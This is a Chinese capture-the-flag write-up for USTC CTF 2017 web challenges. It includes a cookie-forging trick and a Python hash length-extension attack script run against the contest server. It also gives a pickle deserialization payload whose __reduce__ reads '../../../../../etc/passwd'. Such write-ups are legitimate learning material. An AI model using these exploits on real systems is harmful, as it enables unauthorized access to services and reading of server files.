Scu_laji

2017ustc ctf

web 题 writeup

简单验证

首先,看到其中有一个被注释的登录表单,然后进入 admin.php 看一下, 观察 cookies, 根据经验判断应该是 base64 编码,然后换成 admin 的 base64,发包即可

黑客猜奇偶

第一题比较简单,后端未校验前端 str 的长度,直接把前端改成空字符串,看后端传过来的 md5 值直接发包即可。

ajax 本辣鸡没做出来 。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
const _a2 = "、Ai[({)&uohdpw4【gBI”:¥M j‘Ea7'0|2>】G#…[email protected]?C.m。;l:]Lx;“-ven/b—S\\15%`=8t^9!*k,3y<c!~f)(,rH}s?$",
_b2 = "A?>[email protected]:\\o)w$”-'a)I]1:~M】hle/8063G=【.n!y2p<vti,E d{kB`,;}…x#uSs%—5(b4。r(;“CmTH|?j¥9c^*[‘L&!、f7",
_c2 = ":i:C0ay)”>{8,!f&@`\\TH#b—3;B-/w4}[jS】$h<v!【。|k?‘]2¥^srdg5'…mA?7, ~1.E)cnI6eu(G“%*LMt、x9ol=p;(",
_a = _c2[18] + _c2[72] + _a2[11] + _b2[58] + _b2[41] + _a2[43] + _a2[5] + _b2[78] + _c2[8] + _b2[25] + _b2[10] + _c2[29] + _c2[78] + _c2[22] + _c2[63] + _a2[12] + _b2[32] + _c2[41] + _a2[63] + _c2[85] + _b2[35] + _a2[68] + _b2[4] + _b2[49] + _b2[84] + _c2[0] + _b2[30] + _b2[20] + _b2[64] + _b2[83] + _c2[26] + _c2[5] + _a2[37] + _c2[9] + _a2[35] + _a2[28] + _c2[68] + _c2[54] + _c2[49] + _b2[37] + _a2[85] + _a2[32] + _b2[77] + _b2[69] + _a2[30] + _b2[88] + _c2[83] + _b2[70] + _a2[89] + _c2[71] + _b2[56] + _a2[52] + _c2[42] + _b2[23] + _b2[85] + _c2[67] + _b2[73] + _b2[72] + _a2[72] + _c2[23] + _c2[1] + _c2[34] + _c2[17] + _c2[28] + _b2[40] + _a2[14] + _a2[53] + _b2[0] + _b2[76] + _b2[54] + _a2[7] + _a2[38] + _a2[6] + _c2[45] + _b2[24] + _a2[86] + _c2[55] + _b2[86] + _a2[9] + _a2[34] + _c2[20] + _c2[47] + _b2[57] + _b2[42] + _c2[2] + _a2[70] + _b2[13] + _b2[12] + _c2[69] + _a2[75] + _c2[14] + _b2[21],
_b = _c2[39] + _a2[51] + _a2[52] + _a2[29] + _b2[61] + _a2[84] + _b2[45] + _b2[65] + _c2[62] + _c2[73] + _a2[85] + _b2[76] + _c2[42] + _b2[0] + _a2[5] + _b2[85] + _b2[66] + _c2[18] + _a2[82] + _c2[6] + _c2[9] + _b2[78] + _c2[68] + _c2[88] + _b2[23] + _c2[36] + _c2[7] + _b2[35] + _b2[33] + _a2[80] + _c2[79] + _b2[74] + _b2[34] + _a2[4] + _a2[87] + _a2[48] + _a2[36] + _b2[81] + _c2[85] + _c2[29] + _b2[87] + _c2[58] + _b2[49] + _c2[86] + _a2[11] + _b2[16] + _a2[53] + _a2[37] + _b2[91] + _a2[40] + _a2[61] + _a2[64] + _c2[60] + _c2[8] + _a2[39] + _a2[27] + _b2[38] + _b2[27] + _a2[63] + _b2[62] + _b2[89] + _b2[40] + _b2[19] + _a2[70] + _c2[49] + _a2[12] + _a2[76] + _b2[21] + _b2[3] + _b2[26] + _b2[84] + _a2[2] + _c2[51] + _a2[23] + _b2[70] + _c2[82] + _a2[47] + _c2[35] + _c2[4] + _b2[50] + _b2[12] + _a2[8] + _a2[42] + _b2[31] + _a2[49] + _b2[86] + _b2[36] + _b2[54] + _a2[81] + _b2[51] + _c2[45] + _b2[68],
_c = _a2[66] + _c2[38] + _c2[59] + _b2[35] + _c2[43] + _c2[69] + _a2[33] + _a2[36] + _c2[47] + _c2[31] + _b2[10] + _a2[8] + _c2[75] + _a2[9] + _c2[3] + _a2[62] + _a2[63] + _a2[15] + _b2[44] + _c2[68] + _b2[12] + _b2[67] + _a2[2] + _b2[48] + _b2[63] + _b2[31] + _a2[43] + _b2[38] + _b2[20] + _c2[19] + _c2[60] + _b2[70] + _c2[67] + _b2[3] + _c2[82] + _b2[85] + _c2[14] + _a2[40] + _a2[86] + _c2[83] + _a2[48] + _a2[30] + _b2[4] + _b2[86] + _b2[55] + _b2[71] + _b2[23] + _b2[19] + _c2[85] + _c2[26] + _c2[20] + _a2[72] + _a2[6] + _b2[61] + _b2[26] + _b2[14] + _b2[84] + _c2[35] + _b2[27] + _c2[81] + _a2[28] + _c2[84] + _c2[49] + _c2[24] + _b2[49] + _a2[44] + _b2[87] + _b2[9] + _c2[56] + _b2[83] + _a2[85] + _c2[71] + _b2[37] + _b2[53] + _b2[65] + _c2[34] + _a2[47] + _b2[60] + _b2[32] + _a2[90] + _b2[25] + _a2[4] + _a2[55] + _b2[88] + _c2[63] + _b2[62] + _a2[12] + _b2[66] + _b2[82] + _c2[33] + _a2[19] + _a2[11]! function(_) {
function c(_, c) {
var b = (65535 & _) + (65535 & c),
a = (_ >> 16) + (c >> 16) + (b >> 16)
return a << 16 | 65535 & b
}
function b(_, c) {
return _ << c | _ >>> 32 - c
}
function a(_, a, n, t, r, u) {
return c(b(c(c(a, _), c(t, u)), r), n)
}
function n(_, c, b, n, t, r, u) {
return a(c & b | ~c & n, _, c, t, r, u)
}
function t(_, c, b, n, t, r, u) {
return a(c & n | b & ~n, _, c, t, r, u)
}
function r(_, c, b, n, t, r, u) {
return a(c ^ b ^ n, _, c, t, r, u)
}
function u(_, c, b, n, t, r, u) {
return a(b ^ (c | ~n), _, c, t, r, u)
}
function o(_, b) {
const a = _b,
o = _c
_[b >> 5] |= 128 << b % 32, _[(b + 64 >>> 9 << 4) + 14] = b
var e, f, i, s, d, v = 1732584193,
m = -271733879,
p = -1732584194,
h = 271733878
for (e = 0; e < _[a[76] + a[9] + a[27] + a[68] + o[34] + o[46]]; e += 16) f = v, i = m, s = p, d = h, v = n(v, m, p, h, _[e], 7, -680876936), h = n(h, v, m, p, _[e + 1], 12, -389564586), p = n(p, h, v, m, _[e + 2], 17, 606105819), m = n(m, p, h, v, _[e + 3], 22, -1044525330), v = n(v, m, p, h, _[e + 4], 7, -176418897), h = n(h, v, m, p, _[e + 5], 12, 1200080426), p = n(p, h, v, m, _[e + 6], 17, -1473231341), m = n(m, p, h, v, _[e + 7], 22, -45705983), v = n(v, m, p, h, _[e + 8], 7, 1770035416), h = n(h, v, m, p, _[e + 9], 12, -1958414417), p = n(p, h, v, m, _[e + 10], 17, -42063), m = n(m, p, h, v, _[e + 11], 22, -1990404162), v = n(v, m, p, h, _[e + 12], 7, 1804603682), h = n(h, v, m, p, _[e + 13], 12, -40341101), p = n(p, h, v, m, _[e + 14], 17, -1502002290), m = n(m, p, h, v, _[e + 15], 22, 1236535329), v = t(v, m, p, h, _[e + 1], 5, -165796510), h = t(h, v, m, p, _[e + 6], 9, -1069501632), p = t(p, h, v, m, _[e + 11], 14, 643717713), m = t(m, p, h, v, _[e], 20, -373897302), v = t(v, m, p, h, _[e + 5], 5, -701558691), h = t(h, v, m, p, _[e + 10], 9, 38016083), p = t(p, h, v, m, _[e + 15], 14, -660478335), m = t(m, p, h, v, _[e + 4], 20, -405537848), v = t(v, m, p, h, _[e + 9], 5, 568446438), h = t(h, v, m, p, _[e + 14], 9, -1019803690), p = t(p, h, v, m, _[e + 3], 14, -187363961), m = t(m, p, h, v, _[e + 8], 20, 1163531501), v = t(v, m, p, h, _[e + 13], 5, -1444681467), h = t(h, v, m, p, _[e + 2], 9, -51403784), p = t(p, h, v, m, _[e + 7], 14, 1735328473), m = t(m, p, h, v, _[e + 12], 20, -1926607734), v = r(v, m, p, h, _[e + 5], 4, -378558), h = r(h, v, m, p, _[e + 8], 11, -2022574463), p = r(p, h, v, m, _[e + 11], 16, 1839030562), m = r(m, p, h, v, _[e + 14], 23, -35309556), v = r(v, m, p, h, _[e + 1], 4, -1530992060), h = r(h, v, m, p, _[e + 4], 11, 1272893353), p = r(p, h, v, m, _[e + 7], 16, -155497632), m = r(m, p, h, v, _[e + 10], 23, -1094730640), v = r(v, m, p, h, _[e + 13], 4, 681279174), h = r(h, v, m, p, _[e], 11, -358537222), p = r(p, h, v, m, _[e + 3], 16, -722521979), m = r(m, p, h, v, _[e + 6], 23, 76029189), v = r(v, m, p, h, _[e + 9], 4, -640364487), h = r(h, v, m, p, _[e + 12], 11, -421815835), p = r(p, h, v, m, _[e + 15], 16, 530742520), m = r(m, p, h, v, _[e + 2], 23, -995338651), v = u(v, m, p, h, _[e], 6, -198630844), h = u(h, v, m, p, _[e + 7], 10, 1126891415), p = u(p, h, v, m, _[e + 14], 15, -1416354905), m = u(m, p, h, v, _[e + 5], 21, -57434055), v = u(v, m, p, h, _[e + 12], 6, 1700485571), h = u(h, v, m, p, _[e + 3], 10, -1894986606), p = u(p, h, v, m, _[e + 10], 15, -1051523), m = u(m, p, h, v, _[e + 1], 21, -2054922799), v = u(v, m, p, h, _[e + 8], 6, 1873313359), h = u(h, v, m, p, _[e + 15], 10, -30611744), p = u(p, h, v, m, _[e + 6], 15, -1560198380), m = u(m, p, h, v, _[e + 13], 21, 1309151649), v = u(v, m, p, h, _[e + 4], 6, -145523070), h = u(h, v, m, p, _[e + 11], 10, -1120210379), p = u(p, h, v, m, _[e + 2], 15, 718787259), m = u(m, p, h, v, _[e + 9], 21, -343485551), v = c(v, f), m = c(m, i), p = c(p, s), h = c(h, d)
return [v, m, p, h]
}
function e(_) {
const c = _b,
b = _c,
a = _a
var n, t = "",
r = 32 * _[a[74] + a[9] + c[27] + a[37] + c[75] + c[24]]
for (n = 0; r > n; n += 8) t += String[c[18] + b[38] + b[13] + b[65] + b[14] + a[53] + c[55] + c[91] + b[14] + c[43] + c[44] + c[9]](_[n >> 5] >>> n % 32 & 255)
return t
}
function f(_) {
const c = _c,
b = _a,
a = _b
var n, t = []
for (t[(_[a[76] + c[80] + a[27] + a[68] + c[34] + a[24]] >> 2) - 1] = void 0, n = 0; n < t[a[76] + a[9] + b[20] + c[33] + b[83] + b[53]]; n += 1) t[n] = 0
var r = 8 * _[b[74] + b[9] + a[27] + c[33] + b[83] + a[24]]
for (n = 0; r > n; n += 8) t[n >> 5] |= (255 & _[b[88] + c[46] + a[55] + a[91] + a[82] + a[43] + b[2] + c[80] + b[67] + a[75]](n / 8)) << n % 32
return t
}
function i(_) {
const c = _b,
b = _c,
a = _a
return e(o(f(_), 8 * _[c[76] + a[9] + a[20] + a[37] + b[34] + c[24]]))
}
function s(_, c) {
const b = _a,
a = _b,
n = _c
var t, r, u = f(_),
i = [],
s = []
for (i[15] = s[15] = void 0, u[n[76] + a[9] + b[20] + a[68] + b[83] + b[53]] > 16 && (u = o(u, 8 * _[b[74] + n[80] + b[20] + n[33] + a[75] + b[53]])), t = 0; 16 > t; t += 1) i[t] = 909522486 ^ u[t], s[t] = 1549556828 ^ u[t]
return r = o(i[b[88] + a[43] + a[27] + a[37] + a[55] + a[75]](f(c)), 512 + 8 * c[a[76] + a[9] + b[20] + a[68] + b[83] + a[24]]), e(o(s[a[37] + b[78] + b[20] + b[88] + a[55] + a[75]](r), 640))
}
function d(_) {
const c = _a,
b = _c,
a = _b
var n, t, r = a[78] + a[58] + a[56] + a[66] + c[65] + a[51] + a[49] + c[35] + c[21] + c[19] + b[55] + a[7] + b[5] + a[44] + b[80] + b[36],
u = ""
for (t = 0; t < _[b[76] + a[9] + c[20] + a[68] + c[83] + b[46]]; t += 1) n = _[c[88] + b[46] + c[31] + c[75] + c[57] + c[78] + a[44] + a[9] + a[13] + c[83]](t), u += r[a[37] + c[53] + c[31] + b[38] + c[67] + a[75]](n >>> 4 & 15) + r[b[5] + b[46] + a[55] + b[38] + b[2] + c[83]](15 & n)
return u
}
function v(_) {
return unescape(encodeURIComponent(_))
}
function m(_) {
return i(v(_))
}
function p(_) {
return d(m(_))
}
function h(_, c) {
return s(v(_), v(c))
}
function l(_, c) {
return d(h(_, c))
}
function g(_, c, b) {
return c ? b ? h(c, _) : l(c, _) : b ? m(_) : p(_)
}
typeof define === _c[36] + _b[81] + _a[20] + _c[5] + _c[34] + _c[22] + _c[13] + _c[3] && define[_b[55] + _b[41] + _b[44]] ? define(function() {
return g
}) : typeof module === _c[13] + _b[7] + _b[21] + _a[9] + _b[37] + _a[83] && module[_a[9] + _a[50] + _b[65] + _b[43] + _c[38] + _b[75] + _c[77]] ? module[_b[9] + _b[1] + _c[86] + _b[43] + _c[38] + _b[75] + _b[72]] = g : _[_b[41] + _c[91] + _a[76]] = g
}(this),
function() {
"use strict"
function _(_) {
const c = _a,
b = _b,
a = _c
for (var n = RegExp(a[56] + c[12] + b[80] + c[87] + c[62] + a[28] + a[83] + b[54] + a[7] + a[10] + a[88] + a[66] + c[29] + b[33] + c[72] + c[16] + a[4] + c[6] + a[9] + c[86] + b[35] + b[74] + c[86] + a[18] + b[17] + c[24] + b[17] + a[8] + a[26] + c[64] + c[33] + a[54] + c[42] + a[28] + c[58] + b[54] + a[7] + b[64] + b[47] + c[32] + b[40] + c[29] + b[5] + c[36] + b[59] + a[85] + c[68] + c[6] + b[87] + a[17] + b[77] + b[15] + a[73] + b[62] + b[53] + c[66] + a[68] + a[21] + c[40] + b[60] + a[79] + c[81]), t = "", r = 0; r < _[a[76] + a[80] + a[3] + b[68] + b[75] + a[46]]; r++) t += _[a[77] + b[81] + a[74] + b[72] + a[34] + a[38]](r, 1)[c[75] + c[9] + c[15] + b[76] + c[31] + a[5] + b[9]](n, "")
return t = t[c[75] + a[80] + b[65] + b[76] + a[55] + c[88] + b[9]](c[48] + a[80] + a[76] + b[9] + b[37] + b[75], ""), t = t[b[91] + c[9] + c[15] + c[74] + c[31] + a[5] + a[80]](a[84], ""), t = t[b[91] + c[9] + b[65] + c[74] + a[55] + c[88] + b[9]](a[11] + c[20] + b[71] + c[78] + b[27], ""), t = t[b[91] + a[80] + a[86] + a[76] + c[31] + c[88] + b[9]](c[11] + a[46] + c[9] + a[38] + c[9], ""), t = t[b[91] + c[9] + c[15] + b[76] + b[55] + b[37] + c[9]](a[86] + a[55] + c[48] + a[77] + c[11] + a[13] + b[91] + c[2], "")
}
function c(c) {
const b = _a,
a = _b,
n = _c
var t = n[46] + a[55] + b[88] + b[23] + a[9] + n[38] + a[68] + a[55] + n[65] + a[9] + b[18] + n[24] + n[41] + n[60] + n[27] + b[35] + n[48] + b[35] + a[16] + a[16],
r = b[18] + n[24] + b[44] + b[35] + n[27] + a[48] + n[48] + a[48] + n[87] + a[16] + b[53] + n[55] + n[5] + b[23] + b[9] + b[75] + b[37] + a[55] + n[65] + b[9]
console.log(t);
return md5(t + _(c) + r)
}
function b(_) {
const b = _c,
a = _a,
n = _b
var t, r = _ + a[68] + c(_)
t = new XMLHttpRequest, t[b[13] + n[27] + b[38] + b[80] + a[31] + a[2] + b[72] + a[48] + b[34] + b[55] + a[83] + b[80] + n[37] + a[53] + n[55] + a[20] + b[33] + a[9]] = function() {
4 == this[b[38] + n[9] + b[55] + b[91] + n[19] + b[75] + b[34] + n[55] + a[83] + a[9]] && 200 == this[a[48] + a[83] + a[31] + n[75] + a[3] + a[48]] && (document[b[33] + a[9] + a[83] + b[32] + n[76] + b[80] + a[56] + a[9] + n[27] + n[75] + b[49] + n[19] + n[45] + b[91]](a[75] + b[80] + n[72] + b[86] + n[43] + b[3] + b[77] + n[9])[n[71] + a[20] + a[20] + a[9] + b[38] + n[34] + a[71] + b[59] + a[77]] = this[b[38] + b[80] + n[72] + b[86] + b[13] + b[3] + a[48] + b[80] + n[31] + a[9] + b[61] + b[34]])
}, t[n[43] + b[86] + b[80] + n[27]](a[34] + n[6] + a[71], a[31] + n[21] + a[31] + n[1] + b[26] + a[15] + n[24] + n[65] + n[52] + b[77] + a[16] + r, !0), t[n[72] + b[80] + a[20] + b[91]]()
}
document[_a[37] + _c[80] + _a[83] + _a[55] + _a[74] + _c[80] + _b[41] + _b[9] + _a[20] + _c[34] + _b[79] + _b[19] + _a[49] + _a[2]](_a[60] + _b[27] + _b[65] + _c[11] + _b[75] + _a[18])[_a[78] + _c[3] + _a[23] + _c[80] + _b[19] + _b[81] + _a[15]] = function() {
b(document[_b[68] + _c[80] + _a[83] + _a[55] + _b[76] + _c[80] + _c[65] + _c[80] + _c[3] + _b[75] + _c[49] + _c[72] + _c[71] + _b[44]](_b[71] + _b[27] + _c[86] + _b[81] + _b[75] + _c[16])[_b[0] + _a[31] + _a[74] + _c[11] + _b[9]])
}
}()

前端源码在此,听大佬们说把签名算法逆出来就好。

黑客猜奇偶升级版

hash_长度扩展攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
from bs4 import BeautifulSoup
import subprocess
import time
# 假装post一次,确保网页结构一样
se = requests.session()
header = {"Content-Type": "application/x-www-form-urlencoded"}
# r =se.get("http://hack.lug.ustc.edu.cn/dynamic/4/")
info = '''text=%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%00%00%00%00%00I%5faM%5fL01i&submit=%E6%8F%90%E4%BA%A4'''
choice = 1
r = ''
proxies = {"http":"http://127.0.0.1:8080"}
for each in range(31):
data = info + '&choice=' + str(choice)
global r
r = se.post("http://hack.lug.ustc.edu.cn/dynamic/4/", data=data, headers=header,proxies=proxies)
sig = BeautifulSoup(r.text, "lxml").select("html body div p code")[-1]
sign = sig.get_text()
with subprocess.Popen("./hash_extender -d '' --secret 32 --append I_aM_L01i --signature " + sign + " --format md5 --table --out-data-format=html",shell=True,
stdout = subprocess.PIPE) as p:
new_sig = p.stdout.read().strip().split(b' ')[7]
new_sig = int(new_sig.upper(), 16)
choice = new_sig % 2
print(new_sig)
# print(new_sig[-1])
print(choice)
print(r.text)
# print (r.text, se.cookies)

poc 如上。

hash_extender

Hideandseek

这道题坑了我最久。emmm

先放 poc 吧.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import pickle
import base64
from flask import Flask
from handies import file_contents, safe_unpickle
import flag
from app import Credential,CredentialProxy
class exp(object):
def __reduce__(self):
obj_module = __import__("handies")
func = getattr(obj_module, "file_contents")
return(func,("../../../../../etc/passwd",))
e = exp()
s = pickle.dumps(e)
print(s)
print(eval(repr(s)))
print(base64.b64encode(s))

我不会告诉你我因为搞错了模块的名字弄了两天的。

这里__reduce__的用法可以在标准文档中查到

大概意思就是说,这个__reduce__应该返回一个元组。这个东西决定反序列化的执行代码,第一个参数是一个 callable,

除了这些东西,我想分享下我的思路,首先,我尝试的是 pickle Credential,CredentialProxy. 这两个,通过程序的逻辑来实现获取 flag. 显然,这种思路是错误的。然后,我尝试使用 file_contents 来获取 flag,很不幸,我弄错了模块名字。emmmm
,接着,我尝试 pickle flag.flag, 虽说这是个字符串,但是我们也可以序列化它而不读取到其中本地的值.

这里说的是,所有的内建方法和用户定义的 func,仅仅会被 pickle name reference, 简单来说,就是我们可以序列化它,但它执行什么代码取决于反序列化它的环境。

1
2
3
4
5
import flag
e = flag.try_login
s = pickle.dumps(e)
print(s)
print(base64.b64encode(s))

输出如上,只需要把 try_login 改成 flag,就可以正常的输出了。(如果本题修改反序列化过滤方式的话,直接读取 flag.flag 也不失为一种方式)

自己的 git 服务器

直接扔师傅的博客地址就逃。

cve-2017-8386